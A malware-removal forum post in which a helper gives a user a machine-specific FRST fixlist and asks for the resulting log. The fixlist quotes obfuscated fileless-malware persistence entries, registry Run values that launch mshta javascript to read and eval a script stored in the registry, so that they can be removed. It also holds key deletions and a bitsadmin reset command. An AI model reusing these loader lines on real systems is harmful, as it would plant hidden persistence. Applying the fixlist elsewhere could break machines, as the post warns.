This malware is normally monitored by a blank run key which is not showing in your logs. I wonder if they have now changed the monitor file.

Could you attach the combofix log as that should show any hidden entries

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint: HKLM-x32\...\Run: [WinampAgent] => "C:\Program Files (x86)\Winamp\winampa.exe" HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:WxBVRTj8="uA9IbaM";By8=new%20ActiveXObject("WScript.Shell");uFAG7tSc="q";Xp9rl=By8.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");PvrlG9gl="ibKw";eval(Xp9rl);ZQiPL1Nj7=" (the data entry has 3 more characters). <===== ATTENTION (Value Name with invalid characters) Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKLM\...\Policies\Explorer\Run: [**aefe7890<*>] => mshta javascript:UxeT5lmg="jmSAvJRzh";Y0Z3=new%20ActiveXObject("WScript.Shell");gNq4NQ5BS="b7s0";y8tY6J=Y0Z3.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");o8L2EIQxFQ="eny9";eval(y8tY6J) (the data entry has 22 more characters). <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [**7963cd85<*>] => mshta javascript:IZZV6c3B="iVQKNdj6Kx";oU6=new%20ActiveXObject("WScript.Shell");m7OBrFG="yABojYeU";UvI7n=oU6.RegRead("HKCU\\software\\3ba89a97d2\\7d1deee2");imRn88mkR="nGnZ5Wx";eval(UvI7n);b1TtfvD="qe (the data entry has 8 more characters). <===== ATTENTION (Value Name with invalid characters) HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION HKU\S-1-5-21-1306190550-1966074902-702322317-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION U3 a16ip6jg; C:\Windows\System32\Drivers\a16ip6jg.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder) 2015-07-27 20:54 - 2015-07-27 20:58 - 00000000 ____D C:\Users\ideoplastic\AppData\OICE_15_974FA576_32C1D314_2688 2015-07-27 20:54 - 2015-07-27 20:54 - 00000000 ____D C:\Users\ideoplastic\AppData\OICE_15_974FA576_32C1D314_3418 2015-07-26 09:22 - 2015-07-26 09:22 - 00685200 _____ () C:\Users\ideoplastic\Downloads\setup.exe Task: {6D0F3D86-B01F-4AA2-9771-0552DF52FA5C} - System32\Tasks\Amazon Music Helper => C:\Users\ideoplastic\AppData\Local\Amazon Music\Amazon Music Helper.exe [2015-07-21] () C:\Windows\System32\Drivers\a16ip6jg.sys DeleteKey: HKCU\software\3ba89a97d2 DeleteKey: HKLM\\software\Wow6432Node\3ba89a97d2 RemoveProxy: EmptyTemp: CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix
On completion a log will be generated please post that